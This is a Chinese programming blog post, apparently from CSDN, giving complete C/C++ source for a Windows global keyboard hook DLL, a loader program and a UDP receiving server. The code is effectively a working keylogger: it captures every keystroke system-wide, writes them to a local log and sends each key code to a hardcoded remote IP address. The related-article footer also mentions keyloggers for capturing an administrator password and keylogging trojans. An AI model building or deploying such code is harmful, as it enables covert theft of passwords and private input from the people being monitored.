写一个钩子,控制远程主机按键

最新推荐文章于 2018-02-18 19:54:02 发布
最新推荐文章于 2018-02-18 19:54:02 发布
阅读量861 收藏
点赞数
分类专栏: Linux编程学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HelloNiGeSB/article/details/51935473
版权


dllmain.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"

HMODULE hHookDll;// 定义一个全局的HMODULE供SetWindowsHookEx函数使用

BOOL APIENTRY DllMain( HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
	)
{
	hHookDll = hModule;

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

hookdll.cpp

// hokdll.cpp : 定义 DLL 应用程序的导出函数。
//

#include "stdafx.h"
#include "pub.h"
#include <stdio.h>

/*dll使用说明
第一步:将hookdll.h和hookdll.lib加入到项目中
第二部:在项目cpp文件中加入
#include "hookdll.h"
#pragma comment(lib, "hookdll.lib")

第三步:在程序开始执行的时候调用
InstallLaunchEv()

第四步:程序常驻内存

第五步:程序退出的时候调用
UnInstallLaunchEv()

第六步:将hookdll.dll拷贝到项目编译后的可执行文件目录下
*/

HHOOK Hook;

LRESULT CALLBACK LauncherHook(int nCode, WPARAM wParam, LPARAM lParam);

void strerror(DWORD errno);
void savelog(const char *s);
void send_udp(const char *s);

extern HMODULE hHookDll;

__declspec(dllexport) void WINAPI UnInstallLaunchEv()// dll的导出函数
{
	UnhookWindowsHookEx(Hook);
}


__declspec(dllexport) void WINAPI InstallLaunchEv()// dll的导出函数
{
	//HMODULE hHookDll = LoadLibrary("hookdll");// 得到dll的模块句柄

	// Install keyboard hook to trap all keyboard messages
	Hook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)LauncherHook, hHookDll, 0);// 为系统安装
	if (Hook == NULL)
	{
		strerror(GetLastError());
	}
}


LRESULT CALLBACK LauncherHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	LRESULT Result = CallNextHookEx(Hook, nCode, wParam, lParam);

	if (nCode == HC_ACTION)
	{
		char buf[100];
		memset(buf, 0, sizeof(buf));
		sprintf(buf, "%u", wParam); // 参数wParam为键盘扫描码
		send_udp(buf);// 向远程主机发送udp消息

		memset(buf, 0, sizeof(buf));
		sprintf(buf, "%x\t%c\t%08x\n", wParam, wParam, lParam);// 将参数wParam,lParam值写到本地log
		savelog(buf); // 发送后写日志
	}
	return Result;
}

void send_udp(const char *s) // 想目标主机发送消息
{
	init_socket(); // 初始化socket
	SOCKET st = create_send_socket();
	send_work(st, "192.168.0.104", 8080, s);
	close_socket(st);
}

void savelog(const char *s)// 向D盘目录下的my.log文件写log信息
{
	FILE *p = fopen("E:\\my.log", "a+");// 在d盘目录下生成my.log文件
	fputs(s, p);
	fclose(p);
}

void strerror(DWORD errno)// 根据GetLastError()返回值,将错误信息转化为中文,写入my.log文件
{
	void *lpMsgBuf;
	FormatMessageA(
		FORMAT_MESSAGE_ALLOCATE_BUFFER |
		FORMAT_MESSAGE_FROM_SYSTEM |
		FORMAT_MESSAGE_IGNORE_INSERTS,
		NULL,
		errno,
		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
		(char *)&lpMsgBuf,
		0,
		NULL
		);
	savelog((const char *)lpMsgBuf);
	LocalFree(lpMsgBuf);
}

pub.h 

#include <WinSock2.h>

int init_socket();// 初始化socket

int send_work(SOCKET st, const char *hostname, int port, const char *s);// 想hostname指定

void close_socket(SOCKET st);

SOCKET create_send_socket(); // 建立发送数据的udp socket

pub.cpp 

#include "stdafx.h"
#include <stdio.h>
#include "pub.h"

#pragma comment(lib, "Ws2_32.lib")

int init_socket()// 初始化socket
{
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	wVersionRequested = MAKEWORD(1, 1);
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		return -1;
	}

	if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
	{
		WSACleanup();
		return -1;
	}
	return 0;
}

void close_socket(SOCKET st)
{
	closesocket(st);
	WSACleanup();
}

SOCKET create_send_socket() // 建立发送数据的udp socket
{
	SOCKET st = socket(AF_INET, SOCK_DGRAM, 0);// 建立UDP socket
	if (st == 0)
	{
		return 0;// 如果建立socket失败,返回0
	}
	return st;// udp socket建立成功,返回socket描述符
}

int send_work(SOCKET st, const char *hostname, int port, const char *s)// 想hostname指定
{
	struct sockaddr_in addr;
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port); // 指定port为要连接的端口号
	addr.sin_addr.s_addr = inet_addr(hostname);// 指定hostname为要连接的IP地址

	size_t rc = sendto(st, s, strlen(s), 0,
		(struct sockaddr *)&addr, sizeof(addr));// 想指定的IP发送消息
	return rc;
}

然后是建立一个win32引用程序来执行该钩子

testdll.cpp

// testdll.cpp : 定义应用程序的入口点。
//

#include "stdafx.h"
#include "testdll.h"
#include "hookdll.h"

#pragma comment(lib, "hookdll.lib")

int APIENTRY _tWinMain(HINSTANCE hInstance,
	HINSTANCE hPrevInstance,
	LPTSTR    lpCmdLine,
	int       nCmdShow)
{
	InstallLaunchEv();
	::Sleep(300000);
	UnInstallLaunchEv();
	return 0;
}
hookdll.h 

#ifdef __CPLUSPLUS
extern "C" {
#endif
	void WINAPI UnInstallLaunchEv();
	void WINAPI InstallLaunchEv();
#ifdef __CPLUSPLUS
}
#endif
唯一需要注意的是,如果操作系统是64位的,一定要编译64为的才能用,否则会出问题,我一开始就是老出问题,后来发现是这个原因

远程服务端需要注意的是编写的时候不要向Linux那样,因为他和Window是有区别的,还有就是这里钩子发送的是UDP消息,接受时候也要用UDP消息,我这边在本机上给本机发送的测试成功,还没有测在公网上的情况呢

下面是服务端代码

#ifdef WIN
#include <WinSock2.h>
#else
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#define SOCKET int
#endif

#include <stdio.h>

#define BUFSIZE 5 //1024 * 256

int init_socket()
{
// 如果是windows,执行如下代码
#ifdef WIN
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    wVersionRequested = MAKEWORD(1, 1);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0)
    {
        return -1;
    }

    if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
    {
        WSACleanup();
        return -1;
    }
#endif
    return 0;
}

SOCKET create_recv_socket(int port)
{
	if (init_socket() == -1)
	        return 0;
    SOCKET st = socket(AF_INET, SOCK_DGRAM, 0);// 建立UDP socket
    if (st == 0)
        return 0;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(st, (struct sockaddr*)&addr, sizeof(addr)) == -1)
    {
        printf("bind failed %s\n", strerror(errno));
        return 0;
    }
    return st;// udp
}

// server端socket在port指定的断口上listen,接收来自client发送的文件
int recv_work(int port)
{

    SOCKET st_recv = create_recv_socket(port);// 建立接受数据的UDP Socket

    if (st_recv == 0) // 建立失败,函数返回
    {
        return 0;
    }

    char *buf = malloc(BUFSIZE);

#ifdef WIN
    int len = 0;
#else
    unsigned int len = 1;
#endif

    struct sockaddr_in client_addr;
    len = sizeof(client_addr);
    memset(&client_addr, 0, sizeof(client_addr));
    while (1)
    {
        memset(buf, 0, BUFSIZE);
        // 接收来自client的数据,客户端第一次发送的文件名
        printf("recvfrom start\n");
        size_t rc = recvfrom(st_recv, buf, BUFSIZE, 0, (struct sockaddr *)&client_addr, &len);
        printf("recvfrom end\n");
        if (rc <= 0)
        {
            printf("recv failed %s\n", strerror(errno));
        }
        else
        {
        	int tmp = atoi(buf);
        	printf("receiving %c\n", tmp);
        }
    }


    free(buf);
#ifdef WIN
    closesocket(st_recv);
    WSACleanup();
#else
    close(st_recv);
#endif
    return 1;
}


int main(int arg, char *args[])
{
    if (arg < 2)// 如果参数小于3个,main函数退出
    {
        printf("usage:server port\n");
        return EXIT_FAILURE;
    }

    int iport = atoi(args[1]);// 将第二个参数转化为端口号
    if (iport == 0)// 如果端口号为0,main函数退出
    {
        printf("port %d is invalid\n", iport);
        return EXIT_FAILURE;
    }

    printf("recv is begin\n");
    if (recv_work(iport) == 1)// 第一个参数为IP地址,第二个参数为端口号,第三个参数为需要发送的文件名
        printf("recv success\n");
    else
        printf("recv fail\n");
    return EXIT_FAILURE;
}
windows下的makefile文件,注意和Linux下的写法有不同地方 

.SUFFIXES:.c .o
CC=gcc
SERVERSRCS=abc.c
SERVEROBJS=$(SERVERSRCS:.c=.o)
SERVEREXEC=abc.exe

all: $(SERVEROBJS) $(CLIENTOBJS)
	$(CC) -static -o $(SERVEREXEC) $(SERVEROBJS) -lWs2_32
	@echo '----------------ok----------------'
.c.o:
	$(CC) -Wall -DWIN -o $@ -c $<
clean:
	rm -f $(SERVEROBJS)
	rm -f core*



小小哇牛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
易语言TCP_UDP封包拦截修改经典例子源码
10-05
TCP_UDP封包拦截接口\TCP通信.exe ...................\UDP通信.exe ...................\安装钩子DLL.exe ...................\mydll.dll ...................\mydll.e ...................\TCP通信.e ...................\UDP通信.e ...................\安装钩子DLL.e TCP_UDP封包拦截接口 以前玩网络游戏,很多人可能都有使用过WPE这个封包拦截软件,虽然现在WPE已时过境迁,但拦截替换网络封包的功能依然可以在某些抓包软件的身上看到。 本节我们自已也将设计一个类似于WPE那样的封包拦截替换功能的程序.该程序的封包拦截功能是在APIHOOK的基础上扩展而来的。 本节的源代码包里有两个软件,都是用易语编的. TCP通信.exe UDP通信.exe 本节要编的一个封包拦截软件,是需要用钩子EXE把一个钩子DLL文件插入目标进程中。对于拦截封包替换修改封包的功能全在DLL中实现 本节的下面的图中有些内容与源代码里有所不同,一切以源代码为准.
Linux网络 - 数据包的接收过程 UDP为例
qq_44975864的博客
03-14 653
本文将介绍在Linux系统中,数据包是如何一步一步从网卡传到进程手中的。 本文只讨论以太网的物理网卡,不涉及虚拟设备,并且以一个UDP包的接收过程作为示例.
VB.Net远程控制编程实例[鼠标钩子、 键盘钩子]
rainbowsoftware
01-07 2110
功能描述:模拟鼠标事件的函数模型  设置光标到指定位置的函数模型 模拟键盘事件的函数模型命名空间:Lob.API转化后代码如下:    Imports System    Imports System.Runtime.InteropServices        Namespace Lob.API    Public Class Api                    
利用HOOK技术实现DLL远程进程注入
泰瑞的博客
02-18 1万+
转载:http://blog.sina.com.cn/s/blog_651cccf70100tkvb.html上一篇博文《HOOK钩子教程》中,作者较为详细地讲述了如何使用HOOK,并举了一个例子:用HOOK拦截WM_CLOSE消息一次。    实际上,HOOK有多种用法,本文讲述其中一种:利用HOOK技术实现DLL远程进程注入。    远程进程注入,按照作者的理解,就是让其他进程替你并运行DLL...
全局钩子详解
ccfxue的博客
05-03 6600
监控程序的实现       我们发现一些木马或其他病毒程序常常会将我们的键盘或鼠标的操作消息记录下来然后再将它发到他们指定的地方以实现监听.这种功能其他是利用了全局钩子将鼠标或键盘消息进行了截取,从而获得了操作的消息.要得到鼠标和键盘的控制权,我们要用SetWindowsHookEx这个函数:  HHOOK SetWindowsHookEx(     int idHook,        /
C#使用钩子获得按键信息的方法
09-03
主要介绍了C#使用钩子获得按键信息的方法,实例分析了C#中钩子的相关使用技巧,具有一定参考借鉴价值,需要的朋友可以参考下
AHOOKAPI(一)——HOOK基础+一个鼠标钩子实例
02-26
最近在做毕业设计,有一个功能是需要实现对剪切板的监控和进程的防终止保护。原本想从内核层实现,但没有头绪。最后决定从调用层入手,即采用HOOKAPI的技术来挂钩相应的API,从而实现预期的功能。在这样的需求下,就...
利用键盘钩子开发按键发音程序配套源代码.zip
06-19
利用键盘钩子开发按键发音程序配套源代码.zip
vc利用键盘钩子实现按键发音 源代码
04-10
visual c++vc利用键盘钩子hook实现按键发音 源代码
Window 下键盘钩子(监控键盘),并将监控信息发到服务端(UDP)
huangshanchun的专栏
03-13 1892
钩子的本质是一段用以处理系统消息的程序,通过系统调用,将其挂入系统。钩子的种类有很多,每种钩子可以截获并处理相应的消息,每当特定的消息发出,在到达目的窗口之前,钩子程序先行截获该消息、得到对此消息的控制权。此时在钩子函数中就可以对截获的消息进行加工处理,甚至可以强制结束消息的传递。   在本程序中我们需要捕获在任意窗口上的键盘输入,这就需要采用全局钩子以便拦截整个系统的消息,而全局钩子函数必须以
键盘钩子的实现
philip_liu的专栏
04-17 1731
程序用一个系统范围的远程钩子来实现监视所有键盘输入的功能,且程序中的文本框属性为只读,这样可更好的观察键盘钩子(WH_KEYBOARD)是否正确的截获了WM_KEYUP或WM_KEYDOWN消息。现在把键盘钩子当作远程钩子使用,即需要将钩子函数入到DLL中去,且其实含有共享的数据段。因为系统中只有DLL程序是可以插入到其他进程的地址空间中去。命名所钩子函数Dll文件名为HookDll;在HoolDll.h文件中声明需要导出的函数:extern "C" _declspec(dllexport) BOOL
分享一个键盘钩子法,很实用
夜行者
09-29 6652
早就想一个键盘监听器了,学校的电子阅览室设了Administrator屏障,想装软件什么的很麻烦,因此想截获管理员密码。。     花了大概一个星期编了一个,效果还不错,因此来分享一下。。      首先解释一下什么是键盘钩子:          钩子(Hook)是Windows消息处理机制中的一个监视点,应用程序可以在这里安装一个子程序(钩子函数)以监视指定窗口某种类型的消息,所监视
关于SVN Hooks(钩子)的使用 (1) .
weixin_34189116的博客
07-27 882
tags:svn,hooks,svn钩子,Tortoisesvn钩子   由于工作需要,在svn中经常需要使用到svn hooks,把一些常用的记录在这里。   1.什么是svn hooks? 服务器钩子: 经常提到的svn hooks是一组“外挂”脚本程序,是svn提供的一组由svn事件触发的特别有用的程序。这些程序在服务器端执行,可以提供svn之外的一些附加功能。钩子可以调用批处理...
hook函数教程(一)什么是钩子
weixin_30360497的博客
12-09 2023
一、什么是钩子   我们可以首先从字面上了解钩子钩子是干什么的呢?日常生活中,我们的钩子是用来钩住某种东西的,比如,说,鱼钩是用来钓鱼的,一旦鱼咬了钩,钩子就一直钩住鱼了,任凭鱼在水里怎么游,也逃不出鱼钩的控制。同样的,Windows的钩子Hook也是用来钩东西的,比较抽象的是他是用来钩Windows事件或者消息的。最常见的就是鼠标和键盘钩子,用Hook钩子钩住鼠标、键盘,当你的鼠标、键盘有任...
Python简单监控键盘输入的木马实现
热门推荐
以笔为剑的唐吉坷德
06-02 6万+
由于文章制作的木马没有隐藏,实现的功能简单,没有危险性,故将木马开源,大神勿笑。请勿进行非法木马改造。一,所需python库 木马目标运行环境为windows。使用的python类库为 pyHook(获取用户行为,安装提示见本人其他博文) pywin32(提供windows下的python接口,比如pythoncom) py2exe(由于木马目标运行环境为windows,该类库可以将pyth
一个修改用户输入的钩子c++
最新发布
07-13
以下是一个简单的示例,用于演示如何在C++中编修改用户输入的钩子: ```cpp #include #include // 钩子回调函数 LRESULT CALLBACK KeyboardHookCallback(int nCode, WPARAM wParam, LPARAM lParam) { if ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值